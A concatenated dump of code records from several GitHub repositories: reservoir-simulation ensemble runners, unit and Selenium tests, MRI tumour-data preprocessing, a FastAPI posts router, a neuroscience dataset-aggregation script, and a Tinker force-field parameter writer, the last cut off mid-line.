root_name = os.path.splitext(tail)[0] #root_name = SPE1\n \n base_realizations = study['creation']['base_realizations']\n\n commands = []\n realizations = {}\n l = len(base_realizations)\n for i, real_name in tqdm(enumerate(base_realizations.keys()), total=l, desc=\"Preparing: \"):\n \n real_name = root_name + '_%s'%(i+1) # SPE1_i\n \n real_path = os.path.join(simfolder_path, real_name) # /path/to/data/SPE1_i\n Path(real_path).mkdir(parents=True, exist_ok=True)\n\n real_datafile_path = os.path.join(real_path, real_name + '.DATA') # /path/to/data/SPE1_i/SPE1_i.DATA\n base_datafile_path = base_realizations[real_name]\n command = run_case(base_datafile_path, real_datafile_path, controls, simulator_path, real_name)\n commands.append(command)\n realizations[real_name] = real_datafile_path\n \n u.run_bash_commands_in_parallel(commands, max_tries=1, n_parallel=n_parallel)\n return realizations\n \ndef main(argv):\n\n simulator_path = argv[0]\n study_path = argv[1]\n\n if not os.path.isfile(study_path):\n raise ValueError(\"%s cannot be found\" %study_path)\n\n now = datetime.now()\n timestamp = datetime.timestamp(now)\n dt_start = str(datetime.fromtimestamp(timestamp))\n \n study = u.read_json(study_path)\n \n # create actual realization folders\n simfolder_path = os.path.join(STORAGE_DIR, study['Name'])\n Path(simfolder_path).mkdir(parents=True, exist_ok=True)\n \n config = u.read_json(study['creation']['json'])\n realizations = run_cases(simulator_path, study, simfolder_path, config['controls'], n_parallel=config['n_parallel'])\n now = datetime.now()\n timestamp = datetime.timestamp(now)\n dt_end = str(datetime.fromtimestamp(timestamp))\n \n \n studies = u.read_json(study_path)\n studies[\"status\"] = \"simulated\"\n studies[\"simulation\"] = {}\n studies[\"simulation\"][\"start\"] = dt_start\n studies[\"simulation\"][\"end\"] = dt_end\n studies[\"simulation\"][\"realizations\"] = realizations\n \n ens_path = os.path.join(STORAGE_DIR, studies['Name'])\n studies[\"simulation\"][\"storage\"] = ens_path\n \n studies[\"extraction\"] = {} # make sure the data extraction is up-to-date\n \n u.save_to_json(study_path, studies)\n \n\nif __name__ == \"__main__\":\n \"\"\"The arguments are the following:\n 1. study path (str): path to a study json file\n \n Ex: \"python3 src/run_ensemble.py /usr/bin/flow simulations/studies/IE_Poro.json\"\n \"\"\"\n main(sys.argv[1:])","repo_name":"iffanh/petlab","sub_path":"src/run_ensemble.py","file_name":"run_ensemble.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9272740594","text":"from unittest import TestCase\nimport well_profile as wp\nfrom test_create_casing import default_casing\n\n\ndef default_casing_with_trajectory():\n casing = default_casing()\n trajectory = wp.get(2000, profile='J', build_angle=20, kop=800, eob=1300)\n casing.add_trajectory(trajectory)\n\n return casing\n\n\nclass TestCasing(TestCase):\n def test_add_trajectory(self):\n\n casing = default_casing_with_trajectory()\n\n self.assertIsInstance(casing.trajectory.cells_no, int, 'cells_no is not an integer')\n self.assertEqual(len(casing.trajectory.md), casing.trajectory.cells_no,\n 'md has a different number of points')\n self.assertEqual(len(casing.trajectory.tvd), casing.trajectory.cells_no,\n 'tvd has a different number of points')\n self.assertEqual(len(casing.trajectory.inclination), casing.trajectory.cells_no,\n 'incl has different number of points')\n","repo_name":"vamseeachanta/pwploads","sub_path":"tests/test_add_trajectory.py","file_name":"test_add_trajectory.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"25560849159","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom numpy.random import seed\nfrom keras.layers import Input\nfrom keras.models import Model\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten\nfrom collections import Counter\nfrom tqdm import tqdm\n\nimport h5py\nimport numpy as np \nimport os\nimport cv2\nimport random\nimport matplotlib.pyplot as plt\nimport imgaug as ia\nimport imgaug.augmenters as iaa\nfrom keras.utils.np_utils import to_categorical\nfrom PIL import Image\n\n\n\ndef loadDatasetOne():\n images = np.load(\"/Users/sumitkhare/braintumordatasetNPY/images.npy\", allow_pickle=True)\n labels = np.load(\"/Users/sumitkhare/braintumordatasetNPY/labels.npy\", allow_pickle=True)\n integer_to_class = {1: 'meningioma', 2: 'glioma', 3: 'pituitary tumor'}\n \n for i in range(0,len(labels)):\n if labels[i] == 1.0:\n labels[i] = 0\n if labels[i] == 2.0:\n labels[i] = 1\n if labels[i] == 3.0:\n labels[i] = 2\n return([images,labels])\n\n\ndef loadDatasetTwo():\n \n labelsa = ['glioma_tumor','no_tumor','meningioma_tumor','pituitary_tumor']\n training_data = []\n training_labels = []\n \n for i in labelsa:\n folderPath = os.path.join('/Users/sumitkhare/newDataset/Training',i)\n for j in tqdm(os.listdir(folderPath)):\n img = cv2.imread(os.path.join(folderPath,j))\n training_data.append(img)\n training_labels.append(i)\n \n training_data = np.array(training_data)\n training_labels = np.array(training_labels)\n \n return([training_data, training_labels])\n \ndef rgb2Gray(images):\n #Define a new array to store new images in\n arr = []\n #loop through all images\n for i in images:\n #Using CV2 convert the image into grayscale\n img = cv2.cvtColor(i, cv2.COLOR_BGR2GRAY)\n #Reshape the image\n img = img.reshape(256,256,1)\n #Store the image in the new array\n arr.append(img)\n #Return the array of converted images as numpy array\n return np.asarray(arr)\n\n\ndef resizeImages(images, dataset):\n #Empty array to store resized images in\n resizeImages = []\n \n #Loop through all images in dataset\n for i in images:\n #Assign each image to a new variable, use CV2 to resize the images and convert to float32 bit.\n new_img = cv2.resize(i, dsize=(256, 256),interpolation=cv2.INTER_CUBIC).astype(np.float32)\n #Convert the image to numpy array\n new_img = np.asarray(new_img)\n \n #Check if dataset is one, otherwise skip\n if dataset == 1:\n #set new dimentions to single channel\n new_img = new_img.reshape(256,256,1)\n #Append new image to array\n resizeImages.append(new_img)\n #Return the new array as a numpy array\n return np.asarray(resizeImages)\n\ndef reLabelOne(labels):\n newLabels = []\n for i in range(0,len(labels)):\n if labels[i] == 0:\n newLabels.append(1)\n if labels[i] == 1:\n newLabels.append(0)\n if labels[i] == 2:\n newLabels.append(3)\n return newLabels\n\ndef reLabelTwo(labels):\n for i in range(0,len(labels)):\n if labels[i] == 'glioma_tumor':\n labels[i] = 0\n if labels[i] == 'meningioma_tumor':\n labels[i] = 1\n if labels[i] == 'no_tumor':\n labels[i] = 2\n if labels[i] == 'pituitary_tumor':\n labels[i] = 3\n return labels\n\n\ndef augmentImages(image_array, label_array):\n \n seq = iaa.Sequential([\n iaa.Fliplr(0.5), # horizontally flip 50% of the images\n iaa.Affine(\n rotate=(-20, 20),\n shear=(-3, 3))\n ])\n \n augmented_images = seq(images=image_array)\n \n return [augmented_images, label_array]\n\ndef rotateDatasetOne(image_array, label_array):\n \n seq = iaa.Sequential([\n iaa.Affine(\n rotate=(90)),\n ])\n \n augmented_images = seq(images=image_array)\n \n return [augmented_images, label_array]\n\n\ndef loadNumpyDataset(dataSet):\n try:\n returnData = np.load(dataSet, allow_pickle=True)\n print(f'Dataset: {dataSet} loaded successfully')\n return returnData\n except Exception as e: \n print(f'Dataset Failed to load: \\n{e}')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Rashi-Bhave/Brain-tumour-detection","sub_path":"FYP_processing2.py","file_name":"FYP_processing2.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23768096117","text":"'''\n二分查找实现\n'''\n\n\n# 从1 中找到key的索引号\ndef search(l, key):\n low, high = 0, len(l) - 1\n\n while low <= high:\n # 中间数的索引\n mid = (low + high) // 2\n if l[mid] < key:\n low = mid + 1\n elif l[mid] > key:\n high = mid - 1\n else:\n return mid\n\n\nl = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]\nprint('Key index:', search(l, 11))\n","repo_name":"fanxiao168/pythonStudy","sub_path":"AIDStudy/02-DateStruct/day03/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29796106270","text":"from fastapi import APIRouter, Depends, status, HTTPException, Response\nfrom sqlalchemy.orm import Session\nfrom typing import List\n\nfrom social_network.db.db import get_db\nfrom social_network.db.models import User\nfrom social_network.utils.auth import get_current_user\nfrom social_network.utils.crud import PostCrud\nfrom social_network import schemas\n\nrouter = APIRouter(\n prefix='/api',\n tags=['Posts']\n)\n\n@router.get('/posts', response_model=List[schemas.Post])\ndef get_all_posts(db: Session = Depends(get_db)):\n return PostCrud(db).get()\n\n@router.get('/posts/{post_id}', response_model=schemas.Post)\ndef get_post(post_id: int, db: Session = Depends(get_db)):\n post = PostCrud(db).get(post_id, 'id')\n if post:\n return post\n else:\n raise HTTPException(status_code=404)\n \n@router.post('/posts', response_model=schemas.Post, status_code=201)\ndef post_a_post(data: schemas.PostCreate, user: User = Depends(get_current_user), db: Session = Depends(get_db)):\n data.user_id = user.id\n post = PostCrud(db).post(data=data)\n return post\n\n@router.put('/posts/{post_id}', response_model=schemas.Post)\ndef put(post_id: int, data: schemas.PostCreate, user: User = Depends(get_current_user), db: Session = Depends(get_db)):\n post_crud = PostCrud(db)\n post = post_crud.get(post_id, 'id')\n if not post:\n raise HTTPException(status_code=404)\n if post.user_id != user.id:\n raise HTTPException(status_code=401)\n data.user_id = user.id\n post = PostCrud(db).put(data=data, id=post_id)\n return post\n\n@router.delete('/posts/{post_id}', status_code=204)\ndef delete(post_id: int, user: User = Depends(get_current_user), db: Session = Depends(get_db)):\n post_crud = PostCrud(db)\n post = post_crud.get(post_id, 'id')\n if not post:\n raise HTTPException(status_code=404)\n if post.user_id != user.id:\n raise HTTPException(status_code=401)\n post = PostCrud(db).delete(post_id)\n","repo_name":"NickFlabel/fastAPI_small_social_network","sub_path":"social_network/routers/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8515664303","text":"import pytest\nimport time\nfrom selenium import webdriver\n\ndata = ['selenium', 'pytest', 'parameterized']\n\n\n@pytest.fixture(scope='class')\ndef driver():\n driver = webdriver.Chrome()\n yield driver\n driver.quit()\n\n\n@pytest.fixture\ndef baidu_search(request, driver):\n driver.get('https://www.baidu.com/')\n driver.find_element_by_id('kw').send_keys(request.param)\n driver.find_element_by_id('su').click()\n time.sleep(2)\n return request.param, driver.title\n\n\nclass TestBaidu:\n @pytest.mark.parametrize('baidu_search', data, indirect=True)\n def test_search(self, baidu_search):\n expected, result = baidu_search\n assert expected in result\n\n\n\n\n\n","repo_name":"emuyi/test-dev-skills","sub_path":"projects/test_selenium/test_baidu_parametrize.py","file_name":"test_baidu_parametrize.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32279484619","text":"from django.db.models import Count, Q\nfrom actions.models import Session\nfrom subjects.models import Subject\nfrom data.models import Dataset, DatasetType, DataFormat, DataRepository, FileRecord, Revision\nfrom misc.models import LabMember\n\nimport logging\nimport datetime\nimport time\nimport hashlib\nfrom pathlib import Path\nfrom subprocess import Popen, PIPE, STDOUT\n\nimport pandas as pd\nimport globus_sdk as globus\n\nfrom one.alf import io as alfio, files as alfiles\nfrom iblutil.io import hashfile, params\nfrom ibllib.io.extractors.training_trials import StimOnTriggerTimes\n\n\"\"\"\nGenerate per subject trials aggregate files for all culled subjects that have at least one session with an ibl project\nand ibl task protocol.\n1. Check if all sessions have trials tables. For those that don't, try to generate them.\n Log if it's not possible and skip those sessions.\n2. Check for which subjects trial aggregate files need to be generated or updated\n (using hash of individual dataset uuids and hashes)\n a. If file exists and does not need updating, do nothing.\n b. If this is the first version of the file, generate and register dataset, create file records, sync to AWS\n c. If original file is protected, create and register new revision of dataset.\n d. If original file is not protected, overwrite it, update hash and file size of dataset.\n3. Sync to AWS.\n\n# Adapted from\n# https://github.com/int-brain-lab/ibldevtools/blob/master/olivier/archive/2022/2022-03-14_trials_tables.py\n# https://github.com/int-brain-lab/ibldevtools/blob/master/miles/2022-01-17-alyx_trials_table_patch.py\n# https://github.com/int-brain-lab/ibldevtools/blob/master/miles/2022-12-19_register-zainab-aggregates.py\n\"\"\"\n\n'''\n===========\nSETTING UP\n===========\n'''\n\n# Flags\ndry = True # Only tell me which files would be created, don't do anything\nonly_new_subjects = True # Only create aggregates for subjects that don't have an aggregate yet, don't check for update\n\n# Settings\nroot_path = Path('/mnt/ibl')\noutput_path = Path('/mnt/ibl/aggregates/')\ncollection = 'Subjects'\nfile_name = '_ibl_subjectTrials.table.pqt'\nalyx_user = 'julia.huntenburg'\nversion = 1.0\n\n# Set up\noutput_path.mkdir(exist_ok=True, parents=True)\nalyx_user = LabMember.objects.get(username=alyx_user)\ntoday_revision = datetime.datetime.today().strftime('%Y-%m-%d')\n\n# Prepare logger\ntoday = datetime.datetime.today().strftime('%Y%m%d')\nlogger = logging.getLogger('ibllib')\nlogger.setLevel(logging.INFO)\nhandler = logging.handlers.RotatingFileHandler(output_path.joinpath(f'subjectTrials_{today}.log'),\n maxBytes=(1024 * 1024 * 256), )\nlogger.addHandler(handler)\n\n\n# Functions\ndef log_subprocess_output(pipe, log_function=print):\n for line in iter(pipe.readline, b''):\n log_function(line.decode().strip())\n\n\ndef login_auto(globus_client_id, str_app='globus/default'):\n token = params.read(str_app, {})\n required_fields = {'refresh_token', 'access_token', 'expires_at_seconds'}\n if not (token and required_fields.issubset(token.as_dict())):\n raise ValueError(\"Token file doesn't exist, run ibllib.io.globus.setup first\")\n client = globus.NativeAppAuthClient(globus_client_id)\n client.oauth2_start_flow(refresh_tokens=True)\n authorizer = globus.RefreshTokenAuthorizer(token.refresh_token, client)\n return globus.TransferClient(authorizer=authorizer)\n\n\n# Set up dictionaries to catch errors or other logs\nstatus_agg = {}\n\n\"\"\"\"\n========================\nSUBJECT AGGREGATE TABLES\n========================\n\"\"\"\n# Now find all culled subjects with at least one session in an ibl project\nsessions = Session.objects.filter(project__name__icontains='ibl')\nsubjects = Subject.objects.filter(id__in=sessions.values_list('subject'), cull__isnull=False\n ).exclude(nickname__icontains='test')\n# Also make sure to only keep subjects that have at least one session with ibl task protocol and a trials table\nsessions = Session.objects.filter(subject__in=subjects, task_protocol__icontains='ibl')\nsessions = sessions.annotate(\n trials_table_count=Count('data_dataset_session_related',\n filter=Q(data_dataset_session_related__name='_ibl_trials.table.pqt')))\nsessions = sessions.exclude(trials_table_count=0)\nsubjects = Subject.objects.filter(id__in=sessions.values_list('subject'))\n\n# dataset format, type and repos\ndataset_format = DataFormat.objects.get(name='parquet')\ndataset_type = DatasetType.objects.get(name='subjectTrials.table')\naws_repo = DataRepository.objects.get(name='aws_aggregates')\nfi_repo = DataRepository.objects.get(name='flatiron_aggregates')\n\n# Go through subjects and check if aggregate needs to be (re)created\nlogger.info('\\n')\nlogger.info(f' {subjects.count()} SUBJECTS')\n# existing files with this file name\nall_ds = Dataset.objects.filter(name=file_name, default_dataset=True)\n\nfor i, sub in enumerate(subjects):\n try:\n print(f'{i}/{subjects.count()} {sub.nickname}')\n logger.info(f'Subject {sub.nickname} {sub.id}')\n # Find all sessions of this subject\n sub_sess = Session.objects.filter(subject=sub, task_protocol__icontains='ibl')\n # First create hash and check if aggregate needs to be (re)created\n trials_ds = Dataset.objects.filter(session__in=sub_sess, name='_ibl_trials.table.pqt', default_dataset=True)\n trials_ds = trials_ds.order_by('hash')\n # For sessions that have a trials table, add the task data files\n task_ds = Dataset.objects.filter(session__in=trials_ds.values_list('session', flat=True),\n name__in=['_iblrig_taskSettings.raw.json', '_iblrig_taskData.raw.jsonable'],\n default_dataset=True)\n # If we don't have task data for each session, well that's a problem\n if task_ds.count() / 2 < trials_ds.count():\n logger.info('...not all sessions have raw task data')\n status_agg[f'{sub.id}'] = 'ERROR: not all sessions have raw task data'\n continue\n else:\n hash_ds = trials_ds | task_ds\n hash_ds = hash_ds.order_by('hash')\n hash_str = ''.join([str(item) for pair in hash_ds.values_list('hash', 'id') for item in pair]).encode('utf-8')\n new_hash = hashlib.md5(hash_str).hexdigest()\n revision = None # Only set if making a new revision is required\n # Check if this dataset exists\n ds_id = next((d.id for d in all_ds if d.content_object == sub), None)\n ds = Dataset.objects.filter(id=ds_id)\n # If there is exactly one default dataset, check if it needs updating\n if ds.count() == 1:\n if only_new_subjects:\n logger.info('...aggregate exists and only_new_subjects=True, skipping')\n continue\n if ds.first().revision is None:\n out_file = output_path.joinpath(collection, sub.lab.name, sub.nickname, file_name)\n else:\n out_file = output_path.joinpath(collection, sub.lab.name, sub.nickname, ds.first().revision, file_name)\n # See if the file exists on disk (we are on SDSC so need to check with uuid in name)\n # If yes, create the expected hash and try to compare to the hash of the existing file\n if alfiles.add_uuid_string(out_file, ds.first().pk).exists():\n try:\n old_hash = ds.first().json['aggregate_hash']\n except TypeError:\n # If the json doesn't have the hash, just set it to None, we recreate the file in this case\n old_hash = None\n # If the hash is the same we don't need to do anything\n if old_hash == new_hash:\n logger.info('...aggregate exists and is up to date')\n status_agg[f'{sub.id}'] = 'EXIST: aggregate exists, hash match'\n continue\n else:\n # Otherwise check if the file is protected, if yes, create a revision, otherwise overwrite\n if ds.first().is_protected:\n logger.info('...aggregate already exists but is protected, hash mismatch, creating revision')\n status_agg[f'{sub.id}'] = 'REVISION: aggregate exists protected, hash mismatch'\n # Make revision other than None and add revision to file path\n revision, _ = Revision.objects.get_or_create(name=today_revision)\n if ds.first().revision is None:\n out_file = out_file.parent.joinpath(f\"#{today_revision}#\", out_file.name)\n else:\n # If the current default is already a revision, remove the revision part of the path\n out_file = out_file.parent.parent.joinpath(f\"#{today_revision}#\", out_file.name)\n else:\n logger.info('...aggregate already exists but is not protected, hash mismatch, overwriting')\n status_agg[f'{sub.id}'] = 'OVERWRITE: aggregate exists not protected, hash mismatch'\n # Add the uuid to the out file to overwrite the current file\n out_file = alfiles.add_uuid_string(out_file, ds.first().pk)\n # If the dataset entry exist but the dataset cannot be found on disk, just recreate the dataset\n else:\n logger.info('...dataset entry exists but file is missing on disk, creating new')\n status_agg[f'{sub.id}'] = 'CREATE: aggregate dataset entry exists, file missing'\n # Here, too, update the file name with the uuid to create the file on disk\n out_file = alfiles.add_uuid_string(out_file, ds.first().pk)\n # If no dataset exists yet, create it\n elif ds.count() == 0:\n out_file = output_path.joinpath(collection, sub.lab.name, sub.nickname, file_name)\n logger.info('...aggregate does not yet exist, creating.')\n status_agg[f'{sub.id}'] = 'CREATE: aggregate does not exist'\n\n # If dry run, stop here\n if dry:\n logger.info(f'...DRY RUN would create {out_file}')\n continue\n # Create aggregate dataset and save to disk\n all_trials = []\n for t in trials_ds:\n # load trials table\n alf_path = root_path.joinpath(sub.lab.name, 'Subjects', t.file_records.filter(\n data_repository__name__startswith='flatiron').first().relative_path).parent\n trials = alfio.load_object(alf_path, 'trials', attribute='table', short_keys=True)\n trials = trials.to_df()\n\n # Add to list of trials for subject\n trials['session'] = str(t.session.id)\n trials['session_start_time'] = t.session.start_time\n\n # Load quiescence and stimOn_trigger and add to the table\n quiescence = alfio.load_object(alf_path, 'trials',\n attribute='quiescencePeriod', short_keys=True)['quiescencePeriod']\n stimon_trigger, _ = StimOnTriggerTimes(alf_path.parent).extract(save=False)\n trials['quiescence'] = quiescence\n trials['stimOnTrigger_times'] = stimon_trigger\n # TODO: Add protocol number\n # Add to list of trials for subject\n all_trials.append(trials)\n\n # Concatenate trials from all sessions for subject and save\n df_trials = pd.concat(all_trials, ignore_index=True)\n out_file.parent.mkdir(parents=True, exist_ok=True)\n df_trials.to_parquet(out_file)\n assert out_file.exists(), f'Failed to save to {out_file}'\n assert not pd.read_parquet(out_file).empty, f'Failed to read {out_file}'\n logger.info(f\"...Saved {out_file}\")\n\n # Get file size and hash which we need in any case\n file_hash = hashfile.md5(out_file)\n file_size = out_file.stat().st_size\n # If we overwrote an existing file, update hashes and size in the dataset entry\n if ds.count() == 1 and revision is None:\n ds.update(hash=file_hash, file_size=file_size, json={'aggregate_hash': new_hash})\n logger.info(f\"...Updated hash and size of existing dataset entry {ds.first().pk}\")\n # If we made a new file or revision, create new dataset entry and file records\n else:\n # Create dataset entry (make default)\n new_ds = Dataset.objects.create(\n name=file_name,\n hash=file_hash,\n file_size=file_size,\n json={'aggregate_hash': new_hash},\n revision=revision,\n collection=collection,\n default_dataset=True,\n dataset_type=dataset_type,\n data_format=dataset_format,\n created_by=alyx_user,\n version=version,\n content_object=sub,\n )\n # Validate dataset\n new_ds.full_clean()\n new_ds.save()\n # Make previous default dataset not default anymore (if there was one)\n if ds.count() == 1:\n _ = ds.update(default_dataset=False)\n # Change name on disk to include dataset id\n new_out_file = out_file.rename(alfiles.add_uuid_string(out_file, new_ds.pk))\n assert new_out_file.exists(), f\"Failed to save renamed file {new_out_file}\"\n logger.info(f\"...Renamed file to {new_out_file}\")\n # Create one file record per repository\n for repo in [aws_repo, fi_repo]:\n record = {\n 'dataset': new_ds,\n 'data_repository': repo,\n 'relative_path': str(out_file.relative_to(output_path)),\n 'exists': False if repo.name.startswith('aws') else True\n }\n try:\n _ = FileRecord.objects.get_or_create(**record)\n except BaseException as e:\n logger.error(f'...ERROR: Failed to create file record on {repo.name}: {e}')\n status_agg[f'{sub.id}'] = f'ERROR: Failed to create file record on {repo.name}: {e}'\n continue\n\n logger.info(f\"...Created new dataset entry {new_ds.pk} and file records\")\n\n except Exception as e:\n logger.error(f\"...Error for subject {sub.nickname}: {e}\")\n status_agg[f'{sub.id}'] = f'ERROR: {e}'\n continue\n\n# Save status to file\nstatus_agg = pd.DataFrame.from_dict(status_agg, orient='index', columns=['status'])\nstatus_agg.insert(0, 'subject_id', status_agg.index)\nstatus_agg.reset_index(drop=True, inplace=True)\nstatus_agg.to_csv(root_path.joinpath('subjects_trials_status.csv'))\n\nif not dry:\n # Sync whole collection folder to AWS (for now)\n src_dir = str(output_path.joinpath(collection))\n dst_dir = f's3://ibl-brain-wide-map-private/aggregates/{collection}'\n cmd = ['aws', 's3', 'sync', src_dir, dst_dir, '--delete', '--profile', 'ibladmin', '--no-progress']\n logger.info(f\"Syncing {src_dir} to AWS: \" + \" \".join(cmd))\n t0 = time.time()\n process = Popen(cmd, stdout=PIPE, stderr=STDOUT)\n with process.stdout:\n log_subprocess_output(process.stdout, logger.info)\n assert process.wait() == 0\n logger.debug(f'Session sync took {(time.time() - t0)} seconds')\n # Assume that everyting that existed in that folder on FI was synced and set file records to exist\n fi_frs = FileRecord.objects.filter(data_repository=fi_repo, relative_path__startswith=collection, exists=True)\n aws_frs = FileRecord.objects.filter(data_repository=aws_repo, dataset__in=fi_frs.values_list('dataset', flat=True))\n logger.info(f\"Setting {aws_frs.count()} AWS file records to exists=True\")\n aws_frs.update(exists=True)\n","repo_name":"int-brain-lab/iblscripts","sub_path":"analysis_crons/subject_trials_aggregates.py","file_name":"subject_trials_aggregates.py","file_ext":"py","file_size_in_byte":15900,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"71579579025","text":"import pickle \nimport pandas as pd\nfrom AlchemicalAssistant.Vector_algebra import AtomNum2Mass \nfrom AlchemicalAssistant.FEPBOSSReader import tor_cent\n\ndef xyz_prep(atoms, coos, bonds, f_df, resid='A2B',pdbname='COMBO'):\n opdb = open(pdbname+'_tinker.xyz', 'w+')\n opdb.write('%6d %s LigParGen generated OPLS-AA/CM1A Parameters\\n'%(len(atoms),resid))\n for i,r in f_df.iterrows():\n atom_blist = list(bonds[bonds.cl1==i+3]['cl2'])+list(bonds[bonds.cl2==i+3]['cl1'])\n line_atom_blist = ''.join(['%6d'%(l-2) for l in atom_blist])\n opdb.write('%6d%3s%14.6f%12.6f%12.6f%6d%s\\n'%(i+1,r.SYM,r.X,r.Y,r.Z,r.OPLSN,line_atom_blist))\n opdb.close()\n return None\n\ndef tinker_prm(complete_atom_df,all_dfs, pdbname='COMBO'):\n# at_df = pd.read_csv('csv_tinker.csv') \n at_df = complete_atom_df\n df_bnds = all_dfs['BONDS']\n ang_df = all_dfs['ANGLE']\n tor_df = all_dfs['DIHED']\n uid2onum = at_df.set_index('UID')['OPLSN'].to_dict()\n prm = open(pdbname + '.key', 'w+')\n prm.write(\n'''\n\n ##############################\n ## ##\n ## Force Field Definition ##\n ## ##\n ##############################\n\n\nforcefield OPLS-AA\n\nvdwindex TYPE\nvdwtype LENNARD-JONES\nradiusrule GEOMETRIC\nradiustype SIGMA\nradiussize DIAMETER\nepsilonrule GEOMETRIC\ntorsionunit 1.0\nimptorunit 1.0\nvdw-14-scale 2.0\nchg-14-scale 2.0\nelectric 332.06\ndielectric 1.0\n\n\n #############################\n ## ##\n ## Atom Type Definitions ##\n ## ##\n #############################\n\n\n''')\n\n for i,r in at_df.iterrows():\n numbs = list(df_bnds[df_bnds.cl1==i+3]['cl2'])+list(df_bnds[df_bnds.cl2==i+3]['cl1'] )\n prm.write('atom %10d %4d %5s %8s %10d %10.3f %5d\\n' %\n (r.OPLSN,r.OPLSN,r.at_ty,'\\\"'+r.at_symb+'\\\"',r.at_num,AtomNum2Mass(r.at_num),len(numbs)))\n prm.write(\n'''\n\n\n ################################\n ## ##\n ## Van der Waals Parameters ##\n ## ##\n ################################\n\n\n''')\n for i,r in at_df.iterrows():\n prm.write('vdw %11d %16.4f %8.4f \\n' %\n (r.OPLSN, r.SIG, r.EPS))\n prm.write(\n'''\n\n\n ##################################\n ## ##\n ## Bond Stretching Parameters ##\n ## ##\n ##################################\n\n\n'''\n)\n # ask about this one\n for index, row in df_bnds.iterrows():\n atom1_type = uid2onum[row.Ncl1]\n atom2_type = uid2onum[row.Ncl2]\n R = row['RIJ']\n K = row['KIJ']\n\n prm.write('bond %10d %4d %16.2f %8.4f \\n' %\n (atom1_type, atom2_type, K, R))\n\n prm.write(\n'''\n\n\n ################################\n ## ##\n ## Angle Bending Parameters ##\n ## ##\n ################################\n\n\n''')\n for index, row in ang_df.iterrows():\n atom1_type = uid2onum[row['Ncl1']]\n atom2_type = uid2onum[row['Ncl2']]\n atom3_type = uid2onum[row['Ncl3']]\n# R = float(row['R'])\n# K = float(row['K'])\n\n prm.write('angle %9d %4d %4d %8.2f %8.2f \\n' %\n (atom1_type, atom2_type, atom3_type, row.K, row.R))\n prm.write(\n'''\n\n\n ################################\n ## ##\n ## Urey-Bradley Parameters ##\n ## ##\n ################################\n\n\nureybrad 35 34 35 38.25 1.5537\n\n\n #####################################\n ## ##\n ## Improper Torsional Parameters ##\n ## ##\n #####################################\n\n\n\n''')\n for index, row in tor_df.iterrows():\n if row['IMP'] == True:\n cen_nums = tor_cent([row.I,row.J,row.K,row.L],list(df_bnds.UID))\n# atom1_type = int(num2typ2symb[cen_nums[1]][1][5:])#int[int(row['I'])][1].strip('_opls'))\n atom1_type = at_df.ix[cen_nums[1]-3]['OPLSN'] \n# atom2_type = int(num2typ2symb[cen_nums[2]][1][5:])#int[int(row['I'])][1].strip('_opls'))\n atom2_type = at_df.ix[cen_nums[2]-3]['OPLSN'] \n# atom3_central_type = int(num2typ2symb[cen_nums[0]][1][5:]) #int(types[int(row['J'])][1].strip('_opls'))\n atom3_central_type = at_df.ix[cen_nums[0]-3]['OPLSN'] \n #atom4_type = int(num2typ2symb[cen_nums[3]][1][5:])\n atom4_type = at_df.ix[cen_nums[3]-3]['OPLSN'] \n\n V2 = float(row['V2'])\n gamma = 180.0\n n = 2\n\n # ordering for this is weird\n # see https://ryanmrichard.github.io/ForceManII/tinkerformat.html\n prm.write('imptors %7d %4d %4d %4d %12.3f %4.1f %2d \\n' %\n (atom1_type, atom2_type, atom3_central_type, atom4_type, V2, gamma, n))\n prm.write(\n'''\n\n\n ############################\n ## ##\n ## Torsional Parameters ##\n ## ##\n ############################\n\n\n''')\n for index, row in tor_df.iterrows():\n if row['IMP'] == False:\n atom1_type = at_df.ix[row.I-3]['OPLSN']#int(types[int(row['I'])][1].strip('_opls'))\n atom2_type = at_df.ix[row.J-3]['OPLSN']#int(types[int(row['J'])][1].strip('_opls'))\n atom3_type = at_df.ix[row.K-3]['OPLSN']#int(types[int(row['K'])][1].strip('_opls'))\n atom4_type = at_df.ix[row.L-3]['OPLSN']#int(types[int(row['L'])][1].strip('_opls'))\n\n V1 = float(row['V1'])\n gamma1 = 0.0\n n1 = 1\n\n V2 = float(row['V2'])\n gamma2 = 180.0\n n2 = 2\n\n V3 = float(row['V3'])\n gamma3 = 0.0\n n3 = 3\n\n prm.write('torsion %7d %4d %4d %4d %12.3f %4.1f %2d %6.3f %4.1f %2d %6.3f %4.1f %2d \\n' %\n (atom1_type, atom2_type, atom3_type, atom4_type, V1, gamma1, n1, V2, gamma2, n2, V3, gamma3, n3))\n prm.write(\n'''\ntorsion 0 0 0 0 0.000 0.0 1 0.000 180.0 2 0.000 0.0 3\n\n ########################################\n ## ##\n ## Atomic Partial Charge Parameters ##\n ## ##\n ########################################\n\n\n''')\n# types_idx = 0\n for i,r in at_df.iterrows():\n prm.write('charge %11d %16.4f \\n' %\n (r.OPLSN, r.Q))\n\n prm.close()\n return None \n\n#all_dfs = pickle.load(open(\"BNZ_2_PRD.p\", \"rb\")) \n#tinker_prm(all_dfs, resid='A2B')\n","repo_name":"leelasd/AlchemicalAssistant","sub_path":"build/lib/AlchemicalAssistant/TINKER_Rel_FEP.py","file_name":"TINKER_Rel_FEP.py","file_ext":"py","file_size_in_byte":6899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17943506281","text":"from flask import Flask, render_template, request, redirect, url_for, flash, Response\nfrom flask_bootstrap import 